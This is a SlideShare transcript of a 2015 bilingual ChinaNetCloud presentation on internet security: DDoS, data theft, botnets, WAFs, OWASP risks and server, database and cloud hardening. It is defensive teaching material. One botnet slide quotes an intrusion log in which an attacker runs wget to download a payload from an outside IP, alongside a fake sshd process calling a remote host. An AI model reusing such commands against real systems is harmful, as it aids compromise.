SlideShare une entreprise Scribd logo

Internet System Security Overview

Télécharger en tant que PPTX, PDF
C
ChinaNetCloud

Presentation on Internet Security by @SteveMushero of @ChinaNetCloud, given in Shanghai in May, 2015. Covers threats, risks, and solutions. Bi-lingual English & Chinese.

Internet
1  sur  61
Internet Application Security Securing Your System 让应用的安全加固您的系统 By Steve Mushero April, 2015 Build & Manage Servers Optimize & Manage Servers Manage Cloud Servers Copyright © 2015 ChinaNetCloud
Running the World’s Internet Servers www.ChinaNetCloud.com Big Exciting Internet 令人激动的互联网 0 500 1,000 1,500 2,000 2,500 3,000 3,500 1994 1996 1998 2000 2002 2004 2006 2008 2010 2012 2014* Internet Users (in millions) Source: Internet Live Stats Note: * estimate for July 1, 2014. Growth in percentages 80% 76% 73% 56% 49% 47%
Running the World’s Internet Servers www.ChinaNetCloud.com Use every day for everything 每一天,时刻陪伴
Running the World’s Internet Servers www.ChinaNetCloud.com For Every Part of Life 融入生活的每一部分
Running the World’s Internet Servers www.ChinaNetCloud.com But not everything is happy 但,不是诸事如意
Running the World’s Internet Servers www.ChinaNetCloud.com Today’s Three Security Problems 当今三大安全问题 • DDoS • Steal Data 数据盗窃 • Botnets 僵尸网络
Running the World’s Internet Servers www.ChinaNetCloud.com Security Problem #1 – DDoS 第一安全问题-DDoS • For Fun 捣蛋 • Get Money 赚钱 • Competitors 竞争
Running the World’s Internet Servers www.ChinaNetCloud.com Security Problem #2 – Stealing Data 第二安全问题-数据盗窃 • Steal Money 偷钱 • Steal/Sell Data 偷数据 • Steal Code 偷代码
Running the World’s Internet Servers www.ChinaNetCloud.com Security Problem #3 – BotNets 第三安全问题-僵尸网络 • Break In 攻入 • Install Root Kit 安装 • Call home for control 呼叫 • Do evil 作恶 Apr 23 14:34:03 [/root]# wget http://61.147.103.146:999/IP root 1451 0.1 0.0 75196 1260 ? Ssl 00:54 1:36 /root/sshd sshd 1451 root 4u IPv4 318269 0t0 TCP :22839->36.251.187.212:13800 (ESTABLISHED)
Running the World’s Internet Servers www.ChinaNetCloud.com Where is Operations & Security ? Duang – 运维和安全在哪里 ?
Running the World’s Internet Servers www.ChinaNetCloud.com Our Job is to Serve & Protect 我们的职责就是安全代维
Running the World’s Internet Servers www.ChinaNetCloud.com Security is Secondary, Not Important 安全是次要的 Features - 特点 Performance - 性能 Convenience - 便捷 Security 安全
Running the World’s Internet Servers www.ChinaNetCloud.com But becoming more important 但逐渐重要 P2P Lending金融 E-Commerce SaaSFeatures - 特点 Performance - 性能 Convenience - 便捷 Security 安全
Running the World’s Internet Servers www.ChinaNetCloud.com How to be Secure ? 如何安全加固
Running the World’s Internet Servers www.ChinaNetCloud.com What is the most Secure Application? 什么是最安全的应用
Running the World’s Internet Servers www.ChinaNetCloud.com Lots of pieces 很多方面 • Internet – 互联网 • Firewalls - 防火墙 • Web/App Servers - 服务器 • Database - 数据库 • OS - 操作系统 • Servers /Cloud - 物理机/云
Running the World’s Internet Servers www.ChinaNetCloud.com 4 Security Zones 4大安全区域 Internet 互联网 In Front of Your Application 应用之上 Inside Your App 应用之内 Under Your App 应用之下
Running the World’s Internet Servers www.ChinaNetCloud.com Zone: Internet 互联网 Internet 互联网 In Front of Your Application Inside Your Application Under Your Application
Running the World’s Internet Servers www.ChinaNetCloud.com DDoS Attacks DDoS 攻击
Running the World’s Internet Servers www.ChinaNetCloud.com DDoS Type 1 – Overload Bandwidth 第一种类型-带宽超载
Running the World’s Internet Servers www.ChinaNetCloud.com DDoS Type 2 – Overload Servers 第二种类型-服务器超载
Running the World’s Internet Servers www.ChinaNetCloud.com DDoS – Solutions 防DDoS策略 • Cloud Filtering – Anquanbao 安全宝 • CDN Support -CDN支持 • IDC Hardware -IDC 硬件 • Front of Application Blocking 在应用之前阻断 • Complex & Difficult - 复杂而困难 • In Application Mitigation 在应用之内缓解 • Caching - 缓存
Running the World’s Internet Servers www.ChinaNetCloud.com Zone: In Front of Your Application 应用之上 Internet In Front of Your Application 应用之上 Inside Your Application Under Your Application
Running the World’s Internet Servers www.ChinaNetCloud.com Zone: In Front of Your Application 应用之上
Running the World’s Internet Servers www.ChinaNetCloud.com Firewalls – Traditional 防火墙 – 传统 • Required – Basic protection 要求-基本的保护 • Basic filtering 基本的过滤 • NAT inbound • ssh, monitoring • NAT outbound • Backups, DNS, ntp, updates
Running the World’s Internet Servers www.ChinaNetCloud.com WAF – Web App Firewall WAF – 网页应用防火墙 • Increasingly Required 上升的需求 • More Advanced 更加先进 • More Complex 更加复杂 • Can break your Application 会影响应用 • Hard to Manage 难以管理 • Hard to Monitor 难以监控 • Different Types 多种类型 • Patterns vs. Heuristics 安全宝
Running the World’s Internet Servers www.ChinaNetCloud.com WAF – Web App Firewall WAF – 网页应用防火墙 • Two key protections 两种主要的防护 • Protect Application Code 保护应用代码 • OWASP basics • SQL, XSS • DDoS Filtering & Limiting 过滤和限制 • IP, agent, url, session
Running the World’s Internet Servers www.ChinaNetCloud.com WAF – Web App Firewall - Types WAF-网页应用防火墙-类型 • Dedicated Hardware 专有硬件设备 • Palo Alto Networks • Software / Virtual 软件/虚拟服务 • Anquanbao - 安全宝 • Aliyun Cloud Shell - 云盾 • Software Module 软件模块 • modSecurity 安全宝
Running the World’s Internet Servers www.ChinaNetCloud.com Zone: Inside Your Application 在应用之内 Internet Inside Your Application 在应用之内 Under Your Application In Front of Your Application
Running the World’s Internet Servers www.ChinaNetCloud.com Inside Your Application 在应用之内 Main App Security Problem ? APP主要应用安全的问题是什么?
Running the World’s Internet Servers www.ChinaNetCloud.com Inside Your Application 在应用之内 Inside YOUR Application 在你的应用里面
Running the World’s Internet Servers www.ChinaNetCloud.com Inside Your Application 在应用之内 Your Code 你的代码
Running the World’s Internet Servers www.ChinaNetCloud.com Inside Your Application 在应用之内 怎么办?
Running the World’s Internet Servers www.ChinaNetCloud.com Inside Your Application 在应用之内 Write secure code 写安全的代码
Running the World’s Internet Servers www.ChinaNetCloud.com Secure Code – Difficult & Frustrating 安全代码 – 又难又麻烦
Running the World’s Internet Servers www.ChinaNetCloud.com Code – OWASP Project Resources 代码 – OWASP 项目资源 • Info - 介绍 • Guides - 指引 • Tools - 工具 http://owasp.org.cn
Running the World’s Internet Servers www.ChinaNetCloud.com Code – OWASP Top 10 代码-10大应用程序风险 Key Points要点 • A1 – Injection • A2 – Auth & Session Mgmt • A3 – XSS • A7 – Function ACLs • A8 – CSRF • A9 – Insecure Components http://owasp.org.cn
Running the World’s Internet Servers www.ChinaNetCloud.com Inside Your Application – App Scanning 在应用之内-APP扫描 • Best practice 最佳实践 • Find new problems 找到新问题 • As you update 更新 • Third parties 第三方 • New exploits 新的改进
Running the World’s Internet Servers www.ChinaNetCloud.com Zone: Under Your Application 在应用之下 Internet Under Your Application 在应用之下 In Front of Your Application Inside Your Application
Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application ? 在应用之下 什么意思?
Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application – Cloud & Servers 在应用之下-云 & 物理服务器 • Services • Servers & OS • Cloud • Network • 服务软件 • 服务器和操作系统 • 云 • 网络
Running the World’s Internet Servers www.ChinaNetCloud.com Cloud & Servers – Love & Respect Them 在应用之下-需要被关注 • Often forgotten 经常被遗忘 • Often use defaults 经常采取默认设置 • Or random Google search 或用谷歌搜索配置 • Source of great danger 风险的发源地
Running the World’s Internet Servers www.ChinaNetCloud.com Services – Web Servers 服务-网页服务器 • Best practices 最佳实践 • Lots of small issues 许多细小问题 • Running user - 用户运行 • File permissions - 文件许可 • Dangerous uploads - PHP inside JPEGs ! 危险的上传 • SSL – Heartbleed, etc.
Running the World’s Internet Servers www.ChinaNetCloud.com Services – App Servers 服务-APP服务器 • Best Practices 最佳实践 • Delete example APPs 删除样例 • Delete tools (Tomcat) 删除工具 • Patch Software (Java!) 软件补丁
Running the World’s Internet Servers www.ChinaNetCloud.com Services – Database Servers 服务- 数据库服务器 • Use Best Practices 最佳实践 • Secure Configuration 安全配置 • Limited User Permission 限制用户许可 • Separate App & DBA User 区分APP和DBA用户
Running the World’s Internet Servers www.ChinaNetCloud.com Services – Database Servers 服务- 数据库服务器 • Separate User for each App 区分每个APP的用户 • Safe File Permissions 安全的文件许可 • Log SQL if possible 尽可能记录SQL
Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application – Server & OS 应用之下-服务器&操作系统 • Hardened OS 加固 • Iptables 防火墙 • Run Users 用户运行 • File permissions 文件许可
Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application – Server & OS 应用之下-服务器&操作系统 • Logging 日志 • Scanning (ClamAV) 扫描 • Track activity 轨迹追踪 • Automate 自动 • System Updates 系统升级
Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application – Cloud 应用之下-云 • Best Practices 最佳实践 • Control Access 控制登录权限 • Can delete EVERYTHING 会被意外删除
Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application – Cloud 应用之下-云 • Separate Backups 备份隔离 • Out of Cloud 在云之外 • MFA Delete on AWS • AWS上删除MFA
Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application – Network 应用之下-网络 • Generally okay, BUT • VPC on Clouds – Separate 使用公共云上隔离的私有网络 • Consider Out-of-Band Link (DDoS) 考虑带外数据链接
Running the World’s Internet Servers www.ChinaNetCloud.com Under Your Application – Network 应用之下-网络 • Firewalls – Front & Middle 防火墙-前端&中间 • Secure Configuration 安全配置 • Separate test/dev network 区分测试/开发
Running the World’s Internet Servers www.ChinaNetCloud.com Backups as Security 备份即安全 • Backups ARE part of Security 备份属于安全管理的范畴 • If all else fails, use backups 若发生意外,使用备份 • Keep them Secure 安全备份 • Avoid Theft & Tampering 防止盗窃或恶意企图 • Read-Only is Best 最好采用只读
Running the World’s Internet Servers www.ChinaNetCloud.com Security Monitoring 安全监控
Running the World’s Internet Servers www.ChinaNetCloud.com Audit is also Important 审计也很重要 Deep Check to Find Problems 深入检查,发现问题
Running the World’s Internet Servers www.ChinaNetCloud.com Summary 总结 • Security is Critically Important 安全非常重要 • Increasingly Important 并且,越来越重要 • Getting Harder 但也,越来越难 • But more Tools 但,实用工具越来越多 • Details & Experts Help 注重细节,并且需要专家帮助!
Running the World’s Internet Servers www.ChinaNetCloud.com How can ChinaNetCloud help ? 云络怎么帮您?
Running the World’s Internet Servers www.ChinaNetCloud.com We Manage All of this for you 我们为你管理好一切 • Deep Experience 丰富经验 • Experts at Every Level 全面专业 • Part of Overall Operations 是运维工作的一部分
Running the World’s Internet Servers www.ChinaNetCloud.com Thank you! 谢谢
Running the World’s Internet Servers www.ChinaNetCloud.com Thanks from ChinaNetCloud 来自云络的感谢 Pioneers in OaaS – Operations as a Service 运维即服务的先锋团队
ChinaNetCloud Sales@ChinaNetCloud.com www.ChinaNetCloud.com Beijing Office: 北京办公室 Lee World Business Building #305 57 Happiness Village Road, Chaoyang District 朝阳区幸福村中路57号利世商务楼305室 Beijing, 100027 China Silicon Valley Office: 硅谷办公室 California Avenue Palo Alto, 94123 USA Shanghai Headquarters: 上海办公室 X2 Space 1-601, 1238 Xietu Lu Shanghai, 200032 China 斜土路1238号X2空间1号楼601室 T: +86-21-6422-1946 F: +86-21-6422-4911

Recommandé

Avira endpoint security (former avira net work bundle) 繁體中文安裝及佈署手冊 祺荃企業有限公司
Avira endpoint security (former avira net work bundle) 繁體中文安裝及佈署手冊 祺荃企業有限公司Avira endpoint security (former avira net work bundle) 繁體中文安裝及佈署手冊 祺荃企業有限公司
Avira endpoint security (former avira net work bundle) 繁體中文安裝及佈署手冊 祺荃企業有限公司Cheer Chain Enterprise Co., Ltd.
 
賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...
賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...
賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...Wales Chen
 
运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享
运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享
运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享ChinaNetCloud
 
.NET Security Application/Web Development - Part IV
.NET Security Application/Web Development - Part IV.NET Security Application/Web Development - Part IV
.NET Security Application/Web Development - Part IVChen-Tien Tsai
 
.NET Security Application/Web Development - Overview
.NET Security Application/Web Development - Overview.NET Security Application/Web Development - Overview
.NET Security Application/Web Development - OverviewChen-Tien Tsai
 
.NET Security Application/Web Development - Part I
.NET Security Application/Web Development - Part I.NET Security Application/Web Development - Part I
.NET Security Application/Web Development - Part IChen-Tien Tsai
 
6.web 安全架构浅谈
6.web 安全架构浅谈6.web 安全架构浅谈
6.web 安全架构浅谈Hsiao Tim
 
黑站騎士
黑站騎士黑站騎士
黑站騎士openblue
 

Recommandé

Avira endpoint security (former avira net work bundle) 繁體中文安裝及佈署手冊 祺荃企業有限公司
Avira endpoint security (former avira net work bundle) 繁體中文安裝及佈署手冊 祺荃企業有限公司Avira endpoint security (former avira net work bundle) 繁體中文安裝及佈署手冊 祺荃企業有限公司
Avira endpoint security (former avira net work bundle) 繁體中文安裝及佈署手冊 祺荃企業有限公司Cheer Chain Enterprise Co., Ltd.
 
賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...
賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...
賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...Wales Chen
 
运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享
运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享
运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享ChinaNetCloud
 
.NET Security Application/Web Development - Part IV
.NET Security Application/Web Development - Part IV.NET Security Application/Web Development - Part IV
.NET Security Application/Web Development - Part IVChen-Tien Tsai
 
.NET Security Application/Web Development - Overview
.NET Security Application/Web Development - Overview.NET Security Application/Web Development - Overview
.NET Security Application/Web Development - OverviewChen-Tien Tsai
 
.NET Security Application/Web Development - Part I
.NET Security Application/Web Development - Part I.NET Security Application/Web Development - Part I
.NET Security Application/Web Development - Part IChen-Tien Tsai
 
6.web 安全架构浅谈
6.web 安全架构浅谈6.web 安全架构浅谈
6.web 安全架构浅谈Hsiao Tim
 
黑站騎士
黑站騎士黑站騎士
黑站騎士openblue
 
Symantec Endpoint Protection 12.1
Symantec Endpoint Protection 12.1Symantec Endpoint Protection 12.1
Symantec Endpoint Protection 12.1零壹科技股份有限公司
 
.NET Security Application/Web Development - Part II
.NET Security Application/Web Development - Part II.NET Security Application/Web Development - Part II
.NET Security Application/Web Development - Part IIChen-Tien Tsai
 
賽門鐵克個人資料保護法解決方案 (專注在 DLP)
賽門鐵克個人資料保護法解決方案 (專注在 DLP)賽門鐵克個人資料保護法解決方案 (專注在 DLP)
賽門鐵克個人資料保護法解決方案 (專注在 DLP)Wales Chen
 
雲端入侵:郵件攻擊與密碼竊取
雲端入侵:郵件攻擊與密碼竊取雲端入侵:郵件攻擊與密碼竊取
雲端入侵:郵件攻擊與密碼竊取openblue
 
如何使用Aria2实现迅雷脱机下载功能
如何使用Aria2实现迅雷脱机下载功能如何使用Aria2实现迅雷脱机下载功能
如何使用Aria2实现迅雷脱机下载功能Thecus Technology Corp.,
 
Android Taipei 2013 August - Android Apps Security
Android Taipei 2013 August - Android Apps SecurityAndroid Taipei 2013 August - Android Apps Security
Android Taipei 2013 August - Android Apps SecurityTaien Wang
 
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...ChinaNetCloud
 
New immune system of information security from CHINA by WooYun - CODE BLUE 2015
New immune system of information security from CHINA by WooYun - CODE BLUE 2015New immune system of information security from CHINA by WooYun - CODE BLUE 2015
New immune system of information security from CHINA by WooYun - CODE BLUE 2015CODE BLUE
 
Network security reesjohnson
Network security reesjohnsonNetwork security reesjohnson
Network security reesjohnsonITband
 
ChinaNetCloud - Aliyun Joint Event on Cloud Operations
ChinaNetCloud - Aliyun Joint Event on Cloud Operations ChinaNetCloud - Aliyun Joint Event on Cloud Operations
ChinaNetCloud - Aliyun Joint Event on Cloud Operations ChinaNetCloud
 
Internet Cloud Operations - ChinaNetcloud & AWS Event Beijing
Internet Cloud Operations - ChinaNetcloud & AWS Event BeijingInternet Cloud Operations - ChinaNetcloud & AWS Event Beijing
Internet Cloud Operations - ChinaNetcloud & AWS Event BeijingChinaNetCloud
 
Nodejs & NAE
Nodejs & NAENodejs & NAE
Nodejs & NAEq3boy
 
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場 Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場 Bill Hagestad II
 
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版ITband
 
深入浅出 V cloud director
深入浅出 V cloud director深入浅出 V cloud director
深入浅出 V cloud directorITband
 
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰Scourgen Hong
 
twMVC#31網站上線了然後呢
twMVC#31網站上線了然後呢twMVC#31網站上線了然後呢
twMVC#31網站上線了然後呢twMVC
 
中大型规模的网站架构运维 Saac
中大型规模的网站架构运维 Saac中大型规模的网站架构运维 Saac
中大型规模的网站架构运维 SaacChao Zhu
 
深入研究雲端應用程式平台-AppFabric
深入研究雲端應用程式平台-AppFabric深入研究雲端應用程式平台-AppFabric
深入研究雲端應用程式平台-AppFabricJohn Chang
 
Appium手机自动化测试 testerhome_bqcon版本
Appium手机自动化测试 testerhome_bqcon版本Appium手机自动化测试 testerhome_bqcon版本
Appium手机自动化测试 testerhome_bqcon版本延胜 黄
 
IDC大会:新浪SAE架构与设计
IDC大会:新浪SAE架构与设计IDC大会:新浪SAE架构与设计
IDC大会:新浪SAE架构与设计Xi Zeng
 
云计算安全
云计算安全云计算安全
云计算安全Yukin Yang
 

Contenu connexe

Tendances

.NET Security Application/Web Development - Part II
.NET Security Application/Web Development - Part II.NET Security Application/Web Development - Part II
.NET Security Application/Web Development - Part IIChen-Tien Tsai
 
賽門鐵克個人資料保護法解決方案 (專注在 DLP)
賽門鐵克個人資料保護法解決方案 (專注在 DLP)賽門鐵克個人資料保護法解決方案 (專注在 DLP)
賽門鐵克個人資料保護法解決方案 (專注在 DLP)Wales Chen
 
雲端入侵:郵件攻擊與密碼竊取
雲端入侵:郵件攻擊與密碼竊取雲端入侵:郵件攻擊與密碼竊取
雲端入侵:郵件攻擊與密碼竊取openblue
 
如何使用Aria2实现迅雷脱机下载功能
如何使用Aria2实现迅雷脱机下载功能如何使用Aria2实现迅雷脱机下载功能
如何使用Aria2实现迅雷脱机下载功能Thecus Technology Corp.,
 
Android Taipei 2013 August - Android Apps Security
Android Taipei 2013 August - Android Apps SecurityAndroid Taipei 2013 August - Android Apps Security
Android Taipei 2013 August - Android Apps SecurityTaien Wang
 
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...ChinaNetCloud
 
New immune system of information security from CHINA by WooYun - CODE BLUE 2015
New immune system of information security from CHINA by WooYun - CODE BLUE 2015New immune system of information security from CHINA by WooYun - CODE BLUE 2015
New immune system of information security from CHINA by WooYun - CODE BLUE 2015CODE BLUE
 
Network security reesjohnson
Network security reesjohnsonNetwork security reesjohnson
Network security reesjohnsonITband
 

Tendances (9)

Symantec Endpoint Protection 12.1
Symantec Endpoint Protection 12.1Symantec Endpoint Protection 12.1
Symantec Endpoint Protection 12.1
 
.NET Security Application/Web Development - Part II
.NET Security Application/Web Development - Part II.NET Security Application/Web Development - Part II
.NET Security Application/Web Development - Part II
 
賽門鐵克個人資料保護法解決方案 (專注在 DLP)
賽門鐵克個人資料保護法解決方案 (專注在 DLP)賽門鐵克個人資料保護法解決方案 (專注在 DLP)
賽門鐵克個人資料保護法解決方案 (專注在 DLP)
 
雲端入侵:郵件攻擊與密碼竊取
雲端入侵:郵件攻擊與密碼竊取雲端入侵:郵件攻擊與密碼竊取
雲端入侵:郵件攻擊與密碼竊取
 
如何使用Aria2实现迅雷脱机下载功能
如何使用Aria2实现迅雷脱机下载功能如何使用Aria2实现迅雷脱机下载功能
如何使用Aria2实现迅雷脱机下载功能
 
Android Taipei 2013 August - Android Apps Security
Android Taipei 2013 August - Android Apps SecurityAndroid Taipei 2013 August - Android Apps Security
Android Taipei 2013 August - Android Apps Security
 
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...
 
New immune system of information security from CHINA by WooYun - CODE BLUE 2015
New immune system of information security from CHINA by WooYun - CODE BLUE 2015New immune system of information security from CHINA by WooYun - CODE BLUE 2015
New immune system of information security from CHINA by WooYun - CODE BLUE 2015
 
Network security reesjohnson
Network security reesjohnsonNetwork security reesjohnson
Network security reesjohnson
 

Similaire à Internet System Security Overview

ChinaNetCloud - Aliyun Joint Event on Cloud Operations
ChinaNetCloud - Aliyun Joint Event on Cloud Operations ChinaNetCloud - Aliyun Joint Event on Cloud Operations
ChinaNetCloud - Aliyun Joint Event on Cloud Operations ChinaNetCloud
 
Internet Cloud Operations - ChinaNetcloud & AWS Event Beijing
Internet Cloud Operations - ChinaNetcloud & AWS Event BeijingInternet Cloud Operations - ChinaNetcloud & AWS Event Beijing
Internet Cloud Operations - ChinaNetcloud & AWS Event BeijingChinaNetCloud
 
Nodejs & NAE
Nodejs & NAENodejs & NAE
Nodejs & NAEq3boy
 
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場 Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場 Bill Hagestad II
 
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版ITband
 
深入浅出 V cloud director
深入浅出 V cloud director深入浅出 V cloud director
深入浅出 V cloud directorITband
 
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰Scourgen Hong
 
twMVC#31網站上線了然後呢
twMVC#31網站上線了然後呢twMVC#31網站上線了然後呢
twMVC#31網站上線了然後呢twMVC
 
中大型规模的网站架构运维 Saac
中大型规模的网站架构运维 Saac中大型规模的网站架构运维 Saac
中大型规模的网站架构运维 SaacChao Zhu
 
深入研究雲端應用程式平台-AppFabric
深入研究雲端應用程式平台-AppFabric深入研究雲端應用程式平台-AppFabric
深入研究雲端應用程式平台-AppFabricJohn Chang
 
Appium手机自动化测试 testerhome_bqcon版本
Appium手机自动化测试 testerhome_bqcon版本Appium手机自动化测试 testerhome_bqcon版本
Appium手机自动化测试 testerhome_bqcon版本延胜 黄
 
IDC大会:新浪SAE架构与设计
IDC大会:新浪SAE架构与设计IDC大会:新浪SAE架构与设计
IDC大会:新浪SAE架构与设计Xi Zeng
 
云计算安全
云计算安全云计算安全
云计算安全Yukin Yang
 
Windows Phone 7 in azure
Windows Phone 7 in azureWindows Phone 7 in azure
Windows Phone 7 in azureTao Wang
 
新浪云计算公开课第二期:Sae平台的灵活应用(吕毅、魏世江)
新浪云计算公开课第二期:Sae平台的灵活应用(吕毅、魏世江)新浪云计算公开课第二期:Sae平台的灵活应用(吕毅、魏世江)
新浪云计算公开课第二期:Sae平台的灵活应用(吕毅、魏世江)锐 张
 
新浪微博平台与安全架构
新浪微博平台与安全架构新浪微博平台与安全架构
新浪微博平台与安全架构n716
 
云计算时代的新安全挑战与机会
云计算时代的新安全挑战与机会云计算时代的新安全挑战与机会
云计算时代的新安全挑战与机会ITband
 
安全云平台的探索实践
安全云平台的探索实践安全云平台的探索实践
安全云平台的探索实践Hardway Hou
 
从CI到CD[麻袋理财王天青]v1
从CI到CD[麻袋理财王天青]v1从CI到CD[麻袋理财王天青]v1
从CI到CD[麻袋理财王天青]v1天青 王
 

Similaire à Internet System Security Overview (20)

ChinaNetCloud - Aliyun Joint Event on Cloud Operations
ChinaNetCloud - Aliyun Joint Event on Cloud Operations ChinaNetCloud - Aliyun Joint Event on Cloud Operations
ChinaNetCloud - Aliyun Joint Event on Cloud Operations
 
Internet Cloud Operations - ChinaNetcloud & AWS Event Beijing
Internet Cloud Operations - ChinaNetcloud & AWS Event BeijingInternet Cloud Operations - ChinaNetcloud & AWS Event Beijing
Internet Cloud Operations - ChinaNetcloud & AWS Event Beijing
 
Nodejs & NAE
Nodejs & NAENodejs & NAE
Nodejs & NAE
 
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場 Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
 
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
 
深入浅出 V cloud director
深入浅出 V cloud director深入浅出 V cloud director
深入浅出 V cloud director
 
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰
 
twMVC#31網站上線了然後呢
twMVC#31網站上線了然後呢twMVC#31網站上線了然後呢
twMVC#31網站上線了然後呢
 
中大型规模的网站架构运维 Saac
中大型规模的网站架构运维 Saac中大型规模的网站架构运维 Saac
中大型规模的网站架构运维 Saac
 
深入研究雲端應用程式平台-AppFabric
深入研究雲端應用程式平台-AppFabric深入研究雲端應用程式平台-AppFabric
深入研究雲端應用程式平台-AppFabric
 
Appium手机自动化测试 testerhome_bqcon版本
Appium手机自动化测试 testerhome_bqcon版本Appium手机自动化测试 testerhome_bqcon版本
Appium手机自动化测试 testerhome_bqcon版本
 
IDC大会:新浪SAE架构与设计
IDC大会:新浪SAE架构与设计IDC大会:新浪SAE架构与设计
IDC大会:新浪SAE架构与设计
 
云计算安全
云计算安全云计算安全
云计算安全
 
Windows Phone 7 in azure
Windows Phone 7 in azureWindows Phone 7 in azure
Windows Phone 7 in azure
 
新浪云计算公开课第二期:Sae平台的灵活应用(吕毅、魏世江)
新浪云计算公开课第二期:Sae平台的灵活应用(吕毅、魏世江)新浪云计算公开课第二期:Sae平台的灵活应用(吕毅、魏世江)
新浪云计算公开课第二期:Sae平台的灵活应用(吕毅、魏世江)
 
新浪微博平台与安全架构
新浪微博平台与安全架构新浪微博平台与安全架构
新浪微博平台与安全架构
 
云计算时代的新安全挑战与机会
云计算时代的新安全挑战与机会云计算时代的新安全挑战与机会
云计算时代的新安全挑战与机会
 
安全云平台的探索实践
安全云平台的探索实践安全云平台的探索实践
安全云平台的探索实践
 
Meteor
MeteorMeteor
Meteor
 
从CI到CD[麻袋理财王天青]v1
从CI到CD[麻袋理财王天青]v1从CI到CD[麻袋理财王天青]v1
从CI到CD[麻袋理财王天青]v1
 

Plus de ChinaNetCloud

AWS ELB Tips & Best Practices
AWS ELB Tips & Best PracticesAWS ELB Tips & Best Practices
AWS ELB Tips & Best PracticesChinaNetCloud
 
OpsStack--Integrated Operation Platform
OpsStack--Integrated Operation PlatformOpsStack--Integrated Operation Platform
OpsStack--Integrated Operation PlatformChinaNetCloud
 
ChinaNetCloud Online Lecture:Something About Tshark
ChinaNetCloud Online Lecture:Something About TsharkChinaNetCloud Online Lecture:Something About Tshark
ChinaNetCloud Online Lecture:Something About TsharkChinaNetCloud
 
Steve Mushero on Entrepreneurship - 创业 - 崔牛会
Steve Mushero on Entrepreneurship - 创业 - 崔牛会Steve Mushero on Entrepreneurship - 创业 - 崔牛会
Steve Mushero on Entrepreneurship - 创业 - 崔牛会ChinaNetCloud
 
Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲
Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲
